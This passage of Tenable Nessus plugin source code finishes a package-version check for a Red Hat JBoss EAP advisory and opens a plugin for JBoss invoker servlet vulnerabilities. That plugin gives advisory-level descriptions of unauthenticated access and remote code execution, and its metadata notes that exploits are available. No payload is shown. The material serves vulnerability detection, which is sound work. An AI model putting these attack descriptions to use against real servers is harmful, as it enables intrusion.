value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-demo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossas"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-jbossweb2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-native"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat6"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:netty"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-federation"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-idp"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-pdp"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:picketlink-quickstarts-sts"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy-examples"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy-javadoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:resteasy-manual"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rh-eap-docs-examples"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-ant-bundle-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-common-parent"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-client-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-comm-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-dbutils"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-domain"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-gui"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-native-system"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-parent"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-api"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugin-container"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-plugindoc"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-core-util"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-filetemplate-bundle-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-helpers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-jboss-as-common"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-jmx-plugin"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-modules-parent"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-parent"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-platform-plugin"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-plugin-validator"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-pluginAnnotations"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-pluginGen"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-plugins-parent"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:rhq-rtfilter"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-agent"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-all"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-aop"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-beans"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-context"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:spring2-core"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:wss4j"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xerces-j2"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xerces-j2-scripts"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.1-apis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.2-apis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-jaxp-1.3-apis"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver10"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-resolver12"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-which10"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-commons-which11"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:xml-security"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5"); script_set_attribute(attribute:"patch_publication_date", value:"2013/01/24"); script_set_attribute(attribute:"plugin_publication_date", value:"2013/01/24"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = eregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! ereg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2013:0192"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (! (rpm_exists(release:"RHEL5", rpm:"jbossas-client-"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, "JBoss EAP"); if (rpm_check(release:"RHEL5", reference:"aopalliance-1.0-5.2.jdk6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"apache-cxf-2.2.12-6.1.patch_04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"bsh2-2.0-0.b4.15.1.patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"bsh2-bsf-2.0-0.b4.15.1.patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"glassfish-jaxb-2.1.12-12_patch_03.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"google-guice-2.0-3.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-3.3.2-1.5.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-annotations-3.4.0-3.3.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-annotations-javadoc-3.4.0-3.3.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-entitymanager-3.4.0-4.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-entitymanager-javadoc-3.4.0-4.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-javadoc-3.3.2-1.5.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-search-3.1.1-2.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hibernate3-search-javadoc-3.1.1-2.4.GA_CP05.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"hornetq-2.2.24-1.EAP.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"i386", reference:"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"hornetq-native-2.2.20-1.EAP.GA.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jacorb-jboss-2.3.2-2.jboss_1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"javassist-3.12.0-6.SP1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-aop2-2.1.6-5.CP06.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-bootstrap-1.0.2-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cache-core-3.2.11-1.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cache-pojo-3.0.1-1.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cl-2.0.11-1.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-cluster-ha-server-api-1.2.1-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-common-beans-1.0.1-2.1.Final.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-common-core-2.2.21-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"i386", reference:"jboss-eap5-native-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"jboss-eap5-native-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb-3.0-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-cache-1.0.0-4.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-core-1.3.9-0.4.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-ext-api-1.0.0-4.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-ext-api-impl-1.0.0-3.7.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-interceptors-1.0.9-0.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-metadata-1.0.0-3.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-metrics-deployer-1.1.1-0.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-security-1.0.2-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-timeout-0.1.1-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-timeout-3.0-api-0.1.1-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-timeout-spi-0.1.1-0.5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-ejb3-transactions-1.0.2-1.4.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jacc-1.1-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jad-1.2-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jaspi-1.0-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-javaee-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-javaee-poms-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jaxrpc-api_1.1_spec-1.0.0-16.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jca-1.5-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jms-1.1-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-jpa-deployers-1.0.0-6.1SP2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-logmanager-1.1.2-6.GA_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-messaging-1.4.8-12.SP9.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-naming-5.0.3-5.1.CP02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-reflect-2.0.4-2.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-remoting-2.5.4-10.SP4.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-docs-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-examples-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-seam2-runtime-2.2.6.EAP5-10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-security-negotiation-2.1.3-1.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-security-spi-2.0.5-4.SP3_1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-transaction-1.0.1-api-5.0.2-2.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jboss-vfs2-2.2.1-4.GA.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-client-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-hornetq-5.2.0-5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-messaging-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-tp-licenses-5.2.0-7.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-ws-cxf-5.2.0-7.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossas-ws-native-5.2.0-14.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbosssx2-2.0.5-8.SP3_1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossts-4.6.1-12.CP13.8.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossts-javadoc-4.6.1-12.CP13.8.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-el-1.0-api-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-jsp-2.1-api-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-lib-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossweb-servlet-2.5-api-2.1.13-2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-3.1.2-13.SP15_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-common-1.1.0-9.SP10.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-framework-3.1.2-9.SP13.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jbossws-spi-1.1.2-6.SP8.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jgroups-2.6.22-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-embedded-1.3.4-19.SP6.9.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-hibernate-plugin-3.0.0-14.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-jboss-as-5-plugin-3.0.0-14.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"jopr-jboss-cache-v3-plugin-3.0.0-15.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-demo-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-jbossas-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-jbossweb2-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"i386", reference:"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"mod_cluster-native-1.0.10-10.GA_CP04_patch01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"mod_cluster-tomcat6-1.0.10-12.2.GA_CP04.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"netty-3.2.5-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-federation-2.1.5-3.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-idp-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-pdp-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"picketlink-quickstarts-sts-2.1.5-1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-examples-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-javadoc-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"resteasy-manual-1.2.1-18.CP02_patch02.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rh-eap-docs-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rh-eap-docs-examples-5.2.0-6.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-ant-bundle-common-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-common-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-client-api-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-comm-api-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-dbutils-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-domain-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-gui-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-native-system-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-plugin-api-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-plugin-container-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-plugindoc-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-core-util-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-filetemplate-bundle-common-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-helpers-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-jboss-as-common-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-jmx-plugin-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-modules-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-platform-plugin-3.0.0-14.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-plugin-validator-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-pluginAnnotations-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-pluginGen-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-plugins-parent-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"rhq-rtfilter-3.0.0-21.EmbJopr5.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-agent-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-all-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-aop-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-beans-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-context-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"spring2-core-2.5.6-9.SEC03.1.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"wss4j-1.5.12-4.1_patch_02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xerces-j2-2.9.1-10.patch02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xerces-j2-scripts-2.9.1-10.patch02.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-jaxp-1.1-apis-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-jaxp-1.2-apis-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-jaxp-1.3-apis-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-resolver10-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-resolver11-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-resolver12-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-which10-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-commons-which11-1.3.04-8.2_patch_01.ep5.el5")) flag++; if (rpm_check(release:"RHEL5", reference:"xml-security-1.5.1-2.ep5.el5")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "aopalliance / apache-cxf / bsh2 / bsh2-bsf / glassfish-jaxb / etc"); } }NASL family CGI abuses NASL id JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL description The last seen 2020-06-01 modified 2020-06-02 plugin id 70414 published 2013-10-14 reporter This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/70414 title Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(70414); script_version("1.22"); script_cvs_date("Date: 2019/11/27"); script_cve_id("CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"); script_bugtraq_id(57552, 62854, 77037); script_xref(name:"CERT", value:"632656"); script_xref(name:"EDB-ID", value:"16318"); script_xref(name:"EDB-ID", value:"21080"); script_xref(name:"EDB-ID", value:"28713"); script_xref(name:"EDB-ID", value:"30211"); script_xref(name:"ZDI", value:"ZDI-13-229"); script_xref(name:"HP", value:"HPSBGN02952"); script_xref(name:"HP", value:"SSRT101127"); script_xref(name:"HP", value:"emr_na-c04041110"); script_name(english:"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities"); script_summary(english:"Attempts to access the servlets without credentials."); script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by multiple vulnerabilities."); script_set_attribute(attribute:"description", value: "The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities : - A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access. (CVE-2007-1036) - A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code. (CVE-2012-0874) - A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier. (CVE-2013-4810)"); # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?74979c27"); script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-229/"); # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?52567bc1"); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2013/Oct/126"); script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/530241/30/0/threaded"); script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt"); script_set_attribute(attribute:"solution", value: "If using EMC Data Protection Advisor, either upgrade to version 6.x or apply the workaround for 5.x. Otherwise, contact the vendor or remove any affected JBoss servlets."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); 